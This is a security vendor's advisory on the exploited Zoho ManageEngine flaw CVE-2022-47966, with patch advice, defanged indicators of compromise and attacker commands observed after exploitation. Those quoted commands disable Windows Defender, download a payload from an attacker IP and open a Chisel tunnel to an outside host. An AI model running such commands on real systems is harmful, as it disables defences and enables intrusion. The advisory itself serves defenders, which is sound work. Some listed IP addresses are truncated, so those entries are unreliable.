Flash Notices

Flash Notice: UPDATE - Zoho ManageEngine Vulnerability Exploited in the Wild

Written by Marketing | Jan 24, 2023 3:42:14 PM

UPDATE: 2/27/2023 - Last month, Avertium published the below Flash Notice regarding a Zoho ManageEngine (CVE-2022-47966) vulnerability being exploited in the wild. The vulnerability is a pre-authentication remote code execution vulnerability stemming from an outdated version of the Apache Santuario library and was found in two dozen ManageEngine products.  

While the vulnerability has been patched, there is a growing number of threat actors exploiting the flaw. CVE-2022-47966 allows for full takeover of the compromised system by unauthenticated attackers and victims are located across the globe within various industries. Based on the analysis of Bitdefender’s researchers, 2,000 to 4,000 servers accessible from the internet are still running at least one of the vulnerable versions of Apache Santuario.  

Bitdefender stated that the existing PoC is not capable of exploiting all servers, as SAML configuration is required. However, it is highly recommended that all businesses running vulnerable versions patch immediately. Please see the link to ManageEngine’s patch guidance mentioned in our original Flash Notice below.  

 

 

UPDATED INDICATORS OF COMPROMISE (IoCs)

URLs  
  • hxxp://80.85.156[.]184:8085/cn.exe  
  • hxxps://tmpfiles[.]org/dl/788858/any.txt  
  • hxxps://tmpfiles[.]org/dl/765036/enc.txt  
  • hxxp://212.192.246[.]232/home/svchost.ps1  
  • hxxp://212.192.246[.]232/temp/conhost.exe  
  • hxxp://111.68.7[.]122:8081/svhost.exe  
  • hxxp://146.70.126[.]178:57228/shell.exe  
  • hxxp://185.163.45[.]86:8000/1.txt  
  • hxxp://79.141.162[.]36:8888/aaaa.txt  
  • hxxp://143.244.153[.]229:8090  
  • hxxp://160.20.147[.]145:8000/favicon.ico  
  • hxxp://104.223.35[.]221/dashboard.html  
  • hxxp://146.4.21[.]94/tmp/tmp/logs.php  
  • hxxp://146.4.21[.]94/tmp/tmp/comp.dat  
  • hxxp://45.146.7[.]20:8000/nc.exe  
  • hxxp://149.28.57[.]130:443/Import.reg  
  • hxxp://149.28.57[.]130:443/time.bat  
  • hxxp://149.28.57[.]130:443/bdredline  
  • hxxp://45.154.14[.]194:443/conhost.txt  
  • hxxp://45.154.14[.]194:443/K7AVWScn.exe  
  • hxxp://45.154.14[.]194:443/conhost.exe  
  • hxxp://45.154.14[.]194:8080/conhost.exe  
  • hxxp://45.154.14[.]194:443/K7AVWScn.pfx  
  • hxxp://45.154.14[.]194:443/K7AVWScn.dll  
  • hxxp://45.154.14[.]194:443/K7AVWScn.txt  
  • hxxp://45.154.14[.]194:443/msftedit.dll  
  • hxxp://45.154.14[.]194:443/OLE.PDB  
  • hxxp://45.154.14[.]194:443/cmd.txt  
  • hxxp://45.154.14[.]194:443/MainFilterInitializer.jar  
  • hxxp://45.154.14[.]194:443/Import.reg  
  • hxxp://45.154.14[.]194:443/time.bat 
Files 
  • b777226ef93acdb168980bbca82a48fe  
  • 8da896375e5d33e7d7486dbf71d008d8  
  • 5c0227204548c5a768c2e11da02ff774  
  • e0fb946c00b140693e3cf5de258c22a1  
  • 9758c592ef4b9a2279f8e80e992248b6  
  • 199cb4936f7ef64fa134eb3cefff0518  
  • 988038d8407d510c905183b8f6c421d6  
  • edac597788e7c3df14a5fdcd13ee8916  
  • 383b0d0dda2d7557b5cca518f53256b9  
  • e3cff253b9ad9050eb57d957624b796e  
  • 53deb494057bb8e5d72b0f53bab1cb44  
  • 527c71c523d275c8367b67bbebf48e9f  
  • 61e82cae3c97887e4b367e507c4995ed  
  • c027d641c4c1e9d9ad048cda2af85db6  
  • 4960591cc04b080827020393f21c405b  
  • bfe79b11ee1b82ae95b14fd53b6c3fd3 
IP Addresses  
  • 45.154.14[.]194  
  • 149.28.57[.]130  
  • 78.141.247[.]105  
  • 80.85.156[.]184  
  • 135.181.121[.]232  
  • 45.146.7[.]20  
  • 5.255.107[.]19  
  • 139.99.118[.]61  
  • 212.192.246[.]232  
  • 111.68.7[.]122  
  • 146.70.126[.]178  
  • 185.163.45[.]86  
  • 79.141.162[.]36  
  • 143.244.153[.]229  
  • 160.20.147[.]145  
  • 104.223.35[.]221  
  • 146.4.21[.]94 
Domains 
  • 0xx1.kaspenskyupdates[.]com  
  • icy51j1b6sbewpauivxwfrmcu30vok.oastify[.]com 

 

 

overview

A vulnerability was found in two dozen ManageEngine products which is currently being exploited in the wild. CVE-2022-47966 is a pre-authentication remote code execution (RCE) vulnerability stemming from an outdated version of the Apache Santuario library.

CVE-2022-47966 impacts several popular products used by large organizations, including ServiceDesk Plus, ADSelfService Plus, Active Directory 360, Access Manager Plus, and others. Between October and November 2022, patches were released but the timing of the fixed version releases varies by product.

During testing, researchers from Rapid7 found that some products may be more exploitable than others. For example, the researchers stated that ServiceDesk Plus is easy to exploit with the proof-of-concept code (PoC), but successful attackers would need to obtain two additional pieces of information to modify the PoC.

As previously stated, an obsolete version of the Apache Santuario library, which implements security requirements for XML, was the cause of the vulnerability. A SAML request with an incorrect signature can be used to exploit the issue if SAML single sign-on is currently or has previously been enabled on those products.

Due to the popularity of ManageEngine solutions, a vulnerability such as CVE-2022-47966 puts organizations at serious risk by giving attackers initial access and the potential to move laterally using privileged credentials. Avertium recommends that all organizations using the affected products listed in ManageEngine’s advisory, patch immediately.

 

 

avertium's recommendations

Please read ManageEngine’s advisory for updated product and version information, as well as patch guidance.

 

 

INDICATORS OF COMPROMISE (IoCs)

IP Addresses

  • 28.193[.]216
  • 93.193[.]64
  • 68.7[.]122

Post Exploitation MITRE ATT&CK Techniques (observed by Rapid7)

  • 001 Defense Evasion: Disable \ Modify tools (Disable Defender realtime)
    • Example:

powershell -windowstyle hidden set-mppreference –

disablerealtimemonitoring

set-mppreference -exclusionpath c:\users\public

 

  • T1105 Ingress Tool Transfer: Powershell cmdlet Invoke-WebRequest(IWR) used to download additional remote access tools
    • Example:

invoke-webrequest -uri http://111.68.7[.]122:8081/svhost.exe

  • T1572 Protocol Tunneling: Chisel, Golang implementation of protocol tunneling tool - similar to Plink. Tunneling over socks proxy with Chisel.
    • Example:

c:\users\public\svhost.exe client 111.68.7[.]122:8080

R:0.0.0.0:43566:socks

 

 

 

How Avertium is Protecting Our CUSTOMERS

  • Expanding endpoints, cloud computing environments, and accelerated digital transformation have decimated the perimeter in an ever-expanding attack surface. Avertium offers Attack Surface Management, so you’ll have no more blind spots, weak links, or fire drills.
  • Avertium recommends utilizing our service for DFIR (Digital Forensics and Incident Response) to help you rapidly assess, contain, eradicate, and recover from a security incident like a malware attack.
  • Avertium offers Vulnerability Management to provide a deeper understanding and control over organizational information security risks. If your enterprise is facing challenges with the scope, resources, or skills required to implement a vulnerability management program with your team, outsourced solutions can help you bridge the gap.

 

 

SUPPORTING DOCUMENTATION

CVE-2022-47966: Rapid7 Observed Exploitation of Critical ManageEngine Vulnerability | Rapid7 Blog

ManageEngine Security Advisories

PoC for critical ManageEngine bug to be released, so get patching! (CVE-2022-47966) - Help Net Security

 

 

 

 

Related Resource:  2023 Cybersecurity Landscape: 8 Lessons for Cybersecurity Professionals